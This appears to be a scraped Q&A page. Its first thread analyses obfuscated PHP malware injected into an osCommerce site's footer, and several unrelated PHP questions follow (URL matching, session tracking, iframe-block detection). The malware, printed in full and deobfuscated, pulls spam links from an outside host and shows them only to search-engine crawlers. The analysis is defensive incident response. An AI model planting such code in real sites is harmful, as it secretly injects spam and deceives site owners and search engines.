I'm looking at a site that has been exploited by someone/something. The site has had a bunch of links injected into its footer that link to pharmaceutical pitches, and who knows what else. There are/were a lot of links right at the top of the footer. I can only find these now on the cached pages in the Yahoo index. Google is still not happy with the site though, and the live site does not show any links anymore. This is for a client, so I mostly know what I was told, plus what I can find out otherwise.
I found this code at the very top of the footer.php (it's an osCommerce site):
<?php $x13="cou\156\x74"; $x14="\x65\x72\162\x6fr\x5f\x72ep\157\162\164ing"; $x15="\146\151l\x65"; $x16="\146i\154\145_g\x65t\x5f\x63\x6fn\164\145n\164s"; $x17="\163\x74rle\156"; $x18="\163tr\160o\x73"; $x19="su\x62\x73\164\162"; $x1a="tr\151m";
ini_set(' display_errors','off');$x14(0);$x0b = "\150t\x74p\x3a\057\057\x67\145n\x73h\157\x70\056org/\163\x63\162ipt\057\155a\163k\x2e\x74x\x74";$x0c = $x0b; $x0d = $_SERVER["\x52E\115O\124\105_A\104\104\122"]; $x0e = # $x15($x0c); for ( $x0f = 0; $x0f < $x13($x0e); $x0f++ ) {$x10 = $x1a($x0e[$x0f]);if ( $x10 != "" ){ if ( ($x11 = $x18($x10, "*")) !== false ) $x10 = $x19($x10, 0,$x11); if ( $x17($x10) <= $x17($x0d) && $x18($x0d, $x10) === 0 ) { $x12 =$x16("\150\164\164\160\x3a/\057g\145\x6e\x73\x68o\160\056o\162\x67\057\160aral\x69\x6e\x6b\x73\x2f\156e\167\x2f3\057\x66\145e\144\x72\157lle\x72\x2e\143\x6f\x6d\x2e\x74\170\x74"); echo "$x12"; } }}echo "\x3c\041\055\x2d \060\x36\071\x63\x35b4\x66e5\060\062\067\146\x39\x62\0637\x64\x653\x31d2be5\145\141\143\066\x37\040\x2d-\076";?>
When I view the source of the cached pages that have the 'bad' links, this code fits right in where I found it in the footer.php source. A little research on Google shows that there are exploits out there with similar code.
What do you think? When I run it on my own server, all I get in the source is the echoed comment, like so:
<!-- 069c5b4fe5027f9b37de31d2be5eac67 -->
I don't want to just hastily remove the code and say 'you're good' just because it looks bad, especially because I have no immediate way of knowing that the 'bad links' are gone. BTW, the links all go to a dead URL.
You can see the bad pages still cached at Yahoo:
http://74.6.117.48/search/srpcache?ei=UTF-8&p=http%3A%2F%2Fwww.feedroller.com%2F+medicine&fr=yfp-t-701&u=http://cc.bingj.com/cache.aspx?q=http%3a%2f%2fwww.feedroller.com%2f+medicine&d=4746458759365253&mkt=en-US&setlang=en-US&w=b97b0175,d5f14ae5&icp=1&.intl=us&sig=Ifqk1OuvHXNcZnGgPR9PbA--
It seems to reference / load two URLs:
http://genshop.org/script/mask.txt
http://genshop.org/paralinks/new/3/feedroller.com.txt
It's just a spam distribution script.
For partial deobfuscation, use:
print preg_replace('#"[^"]+\\\\\w+"#e', "stripcslashes('$0')", $source);
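(Note: the /e modifier was removed in PHP 7, so on a modern install the equivalent is preg_replace_callback. A sketch, assuming $source holds the injected file's contents:)
// decode the "\x63\157unt"-style string literals (that one is "count")
print preg_replace_callback(
'#"[^"]+\\\\\w+"#',
function ($m) { return stripcslashes($m[0]); },
$source
);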
Here's the deobfuscated script (more or less).
It just dumps the contents of that second URL onto your page.
It only does so when the visitor's REMOTE_ADDR matches a mask list of IPs (search-engine crawlers: Google, et al.), which is why you only see the HTML comment: the spam is served to the crawlers that index the site and hidden from everyone else, to remain undetected.
Looks like you're being attacked by genshop.org.
<?php
$count="cou\156\x74"; // count
$error_reporting="\x65\x72\162\x6fr\x5f\x72ep\157\162\164ing"; // error_reporting
$file="\146\151l\x65"; // file
$file_get_contents="\146i\154\145_g\x65t\x5f\x63\x6fn\164\145n\164s"; // file_get_contents
$strlen="\163\x74rle\156"; // strlen
$strpos="\163tr\160o\x73"; // strpos
$substr="su\x62\x73\164\162"; // substr
$trim="tr\151m"; //trim
ini_set(' display_errors','off'); // stray space in the option name, kept from the original
$error_reporting(0);
$x0b = "http://genshop.org/script/mask.txt";
$url = $x0b;
$tmp = "REMOTE_ADDR";
$x0d = $_SERVER[$tmp];
$tmp_filename = "http://genshop.org/paralinks/new/3/feedroller.com.txt";
$IPs = $file($url); // fetch the IP mask list, one entry per line
for ( $i = 0; $i < $count($IPs); $i++ ) {
$curr_ip = $trim($IPs[$i]);
if ( $curr_ip != "" ) {
// entries may end in a wildcard; keep only the prefix before the "*"
if ( ($x11 = $strpos($curr_ip, "*")) !== false )
$curr_ip = $substr($curr_ip, 0, $x11);
// does the visitor's IP start with one of the masked prefixes?
if ( $strlen($curr_ip) <= $strlen($x0d) && $strpos($x0d, $curr_ip) === 0 ) {
// print spam contents
$x12 = $file_get_contents($tmp_filename);
echo "$x12";
}
}
}
// decodes to: <!-- 069c5b4fe5027f9b37de31d2be5eac67 -->
$tmp2 = "\x3c\041\055\x2d \060\x36\071\x63\x35b4\x66e5\060\062\067\146\x39\x62\0637\x64\x653\x31d2be5\145\141\143\066\x37\040\x2d-\076";
echo $tmp2;
?>
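If you want to confirm the cloaking before deleting the snippet (since you can't otherwise tell whether the links are gone), you could run it in isolation with REMOTE_ADDR overridden to a crawler-style address. A test-harness sketch; the file name is hypothetical, and 66.249.* is a Googlebot range. If genshop.org really is dead, the fetches will fail and nothing will print either way:
<?php
// pretend to be a search-engine crawler, then run only the injected code
$_SERVER['REMOTE_ADDR'] = '66.249.66.1'; // an address in Googlebot's 66.249.* range
include 'suspect_footer_snippet.php'; // hypothetical file containing just the injected snippet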
It is very much malicious; remove it immediately. Exactly how it works is beyond me, but it's clearly part of the compromise of your site.
Related
I'm using the function below to redirect a specific URL to a specific PHP script file:
add_action('wp', function() {
if ( trim(parse_url(add_query_arg(array()), PHP_URL_PATH), '/') === 'pagename' ) {
include(locate_template('give_some.php'));
exit();
}});
It works only for the specified URL, and I want to make it work for multiple URLs. Suppose a file urls.txt contains a number of URLs for which the above code has to be triggered. Any idea how to do this?
I’m a long-time WordPress developer, and one of the best responses to a WordPress problem is “that’s not a WordPress problem, it's just simple PHP (or JavaScript)”. That’s a really good thing, because it makes the problem much easier to talk about.
Your problem, as I understand it, is that you want to compare the current URL to a “file” of possible paths. You’ve got the WordPress equivalent of “current URL”, so I’ll take that for granted, and I’ll also assume you can take a file and convert it into an array (see the sketch after the demo link below). Once you've done that, you parse the URL (which you already do) and check whether its path is in the array:
$url = 'https://www.example.com/pagename?a=b&c=d';
$paths = [
'gerp',
'pagename',
'cheese',
];
$path = trim(parse_url($url, PHP_URL_PATH), '/');
if ( in_array($path, $paths )) {
echo 'yes';
} else {
echo 'no';
}
Demo: https://3v4l.org/NOmpk
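Wiring that back into your hook, the file-to-array step is a single call to file(). A sketch under the assumption that urls.txt sits next to the template and holds one path per line (urls.txt and give_some.php are your names; everything else is standard WordPress):
add_action('wp', function() {
// one path per line; strip trailing newlines and skip blank lines
$paths = file(__DIR__ . '/urls.txt', FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
$path = trim(parse_url(add_query_arg(array()), PHP_URL_PATH), '/');
if ( $paths !== false && in_array($path, $paths, true) ) {
include(locate_template('give_some.php'));
exit();
}
});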
You can use a different hook, request, which allows you to manipulate the request:
add_filter( 'request', function( $request ){});
A simple example (not tested):
add_filter( 'request', function( $request ){
$data = file_get_contents("database.txt"); //read the file
$rows = explode("\n", $data); //create array separate by new line
$rows = array_map("trim", $rows); // for removing any unwanted space
$rowCount = count($rows); // Count your database rows
for ($i=0; $i < $rowCount ; $i++) {
if( isset( $request['pagename'] ) && $rows[$i] == $request['pagename'] ){
include(locate_template('give_some.php'));
}
}
return $request;
});
My advice: don't use .txt files. Save your data in the database and then use it, or create a wp_option field and manage it from a settings page.
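For the option route, a minimal sketch (the option name my_redirect_urls is hypothetical; it assumes one path per line is stored in the option value):
// read the stored list and split it into an array of paths
$raw = get_option('my_redirect_urls', '');
$paths = array_filter(array_map('trim', explode("\n", $raw)));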
I am trying something strange with code. I just want to know whether it is possible to perform PHP code like this:
<?php
$cururl= ucfirst(pathinfo($_SERVER['PHP_SELF'], PATHINFO_FILENAME));
$nexurlw = $cururl-1;
echo "$nexurlw";
?>
I have a problem with this code. My current page URL is 30.php, and I have a 'go to previous page' button on the page; I want to change its URL to 29.php with the help of this function.
But this function echoes 30 every time.
Try this:
$cururl = ucfirst(pathinfo($_SERVER['PHP_SELF'], PATHINFO_FILENAME));
$intUrl = ((int) $cururl) - 1;
$nexurlw = (string) $intUrl.'.php';
echo "$nexurlw";
Even if it happens to be true in your case (because that's the default in a raw PHP installation), there's often no direct mapping between URL locations and filesystem objects (files/directories). For instance, this question's URL is
https://stackoverflow.com/questions/68504314/how-to-get-current-webpage-name-and-echo-with-some-modification, but the Stack Overflow server does not have a directory called 68504314 anywhere on its disk.
Since you want to build a URL from another URL, there isn't even any benefit in involving the filesystem; you can just gather the information about the current URL from $_SERVER['REQUEST_URI']. E.g.:
$previous_page_url = null;
// extract the numeric page name from a URL like /blah/30.php
if (preg_match('#/blah/(\d+)\.php#', $_SERVER['REQUEST_URI'], $matches)) {
$current_page_number = (int)$matches[1];
if ($current_page_number > 1) { // there is no page before 1.php
$previous_page_url = sprintf('/blah/%d.php', $current_page_number - 1);
}
}
I've searched and searched and cannot find anything similar (or at least anything I consider similar or can get my head around).
I'm not great at coding, so I was hoping someone could help me build on my script so far:
<?php
$str3 = array(
'START#EMAIL.COM',
/* the list of emails to be scanned goes here, one per line,
exactly in the form 'user#provider.com' (loaded in from rmcomputers/council) */
'END#EMAIL.COM');
/* Filter code below*/
foreach($str3 as $new)
{
/*List of domains to filter and show */
if (strpos($new, 'teacher.establishment1.sch.uk') !== false || strpos($new, 'teacher.establishment2.sch.uk') !== false || strpos($new, 'teacher.establishment3.sch.uk') !== false || strpos($new, 'teacher.establishment4.sch.uk') !== false || strpos($new, 'teacher.establishment5.sch.uk') !== false)
{
echo "$new" . " <a href=' $new'> $new</a></br>";
}
}
?>
https://pastebin.com/raw/HRdzDJq1
I am looking to improve this script so I don't need to manually edit the domains every so often depending on what I'm looking for.
I will have around 150 "domains" on the list - I'd like to be able to toggle them off/on depending on the search I need to do.
The code on the pastebin, once I've loaded my full list of emails into it, outputs only the users I want, but if I need to output another establishment/domain then I need to edit the code and add/remove domains as required.
You'll probably get the gist of what I'd like to have done eventually.
At the moment I edit the .php file and load it when needed, but this is becoming a nuisance.
Mockup of script
You can pass the domains via $_GET or $_POST variables, separated by commas, and then loop over them after explode().
So your page call would be index.php?domains=domain1.com,domain2.com; you could also do it through a form (see the sketch after the code below).
Your PHP logic would look like this:
$domains = explode(',', $_GET['domains']);
/* Filter code below*/
foreach ($str3 as $new) {
foreach( $domains as $domain){ //Loop the domains
if (strpos($new, $domain) !== false){
echo "$new" . " <a href=' $new'> $new</a></br>";
}
}
}
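And the form route could be a handful of checkboxes posting back to the same script. A sketch only; the checkbox values come from the question's domain list, and with name="domains[]" PHP hands you an array directly, so no explode() is needed:
<form method="get">
<label><input type="checkbox" name="domains[]" value="teacher.establishment1.sch.uk"> establishment1</label>
<label><input type="checkbox" name="domains[]" value="teacher.establishment2.sch.uk"> establishment2</label>
<!-- ...one checkbox per domain you want to be able to toggle... -->
<button type="submit">Filter</button>
</form>
<?php
$domains = isset($_GET['domains']) ? $_GET['domains'] : array(); // only the ticked domains arrive
foreach ($str3 as $new) {
foreach ($domains as $domain) {
if (strpos($new, $domain) !== false) {
echo "$new <a href='$new'>$new</a><br>";
}
}
}
?>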
I currently have the following code (which works, from what I can tell so far):
session_start();
if(!is_array($_SESSION['page'])) {
$_SESSION['page']=array();
}
$_SESSION['page'][]=$_SERVER['REQUEST_URI'];
$entry=reset($_SESSION['page']);
$exit=end($_SESSION['page']);
Is this the best way to accomplish tracking of entry and exit pages with PHP?
Edit:
This (from @T0xicCode) appears to be a better option:
session_start();
if(!isset($_SESSION['page']) || !is_array($_SESSION['page'])) {
$_SESSION['page'] = array('entry' => $_SERVER['REQUEST_URI']);
}
$_SESSION['page']['exit'] = $_SERVER['REQUEST_URI'];
$entry = $_SESSION['page']['entry'];
$exit = $_SESSION['page']['exit'];
I'd suggest using something like Google Analytics, but if you want a DIY, pure-PHP solution, something like the following should work. It doesn't track the pages in the middle, which your original solution does.
session_start();
if(!isset($_SESSION['page']) || !is_array($_SESSION['page'])) { // first hit: record the entry page
$_SESSION['page'] = array('entry' => $_SERVER['REQUEST_URI']);
}
$_SESSION['page']['exit'] = $_SERVER['REQUEST_URI'];
$entry = $_SESSION['page']['entry'];
$exit = $_SESSION['page']['exit'];
You'll also have to determine how often you'll purge old sessions. If I come back after 2 weeks, is it a new browsing session, or is it the continuation of the old one?
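One simple answer to that purge question is an inactivity cutoff stored in the session itself. A sketch; the 30-minute threshold is an arbitrary choice:
session_start();
$now = time();
// if the visitor has been idle past the cutoff, treat this hit as a brand-new browsing session
if (isset($_SESSION['last_seen']) && $now - $_SESSION['last_seen'] > 1800) {
$_SESSION['page'] = array('entry' => $_SERVER['REQUEST_URI']);
}
$_SESSION['last_seen'] = $now;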
I use iframes in my news-aggregation web app. While I am careful to always credit and link publishers, I also respect those who choose to block iframes (by not implementing sneaky workarounds). My question is how I can automatically detect whether iframes will be blocked, given the URL of the external page in question. So far I am using this code:
//get external html
$p = file_get_contents($this->scrape_ready_url);
//check for blocker
$pattern1 = "/window\.self.{1,10}window\.top/";
$s1 = preg_match($pattern1, $p);
//check for blocker2
$pattern2 = "/window\.top.{1,10}window\.self/";
$s2 = preg_match($pattern2, $p);
//condition response
if ($s1 === 1 || $s2 === 1) {
$this->frame = "blocked";
} else {
$this->frame = "not_blocked";
}
This works most of the time (so far), but many publishers such as Yahoo use slight variations of the "self !== top" code which these preg_match patterns fail to catch. I am wondering if there is any universal/general test I can implement to know whether or not a given URL will block an iframe.
Thanks
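A complementary check worth noting: many publishers block framing at the HTTP level via the X-Frame-Options response header (or a Content-Security-Policy frame-ancestors directive) rather than with JavaScript, and response headers are much easier to test reliably than script patterns. A sketch, reusing $this->scrape_ready_url and $this->frame from the code above:
// fetch only the response headers and look for frame-blocking directives
$headers = array_change_key_case(get_headers($this->scrape_ready_url, 1), CASE_LOWER);
$csp = isset($headers['content-security-policy']) ? implode(' ', (array)$headers['content-security-policy']) : '';
if (isset($headers['x-frame-options']) || stripos($csp, 'frame-ancestors') !== false) {
$this->frame = "blocked";
}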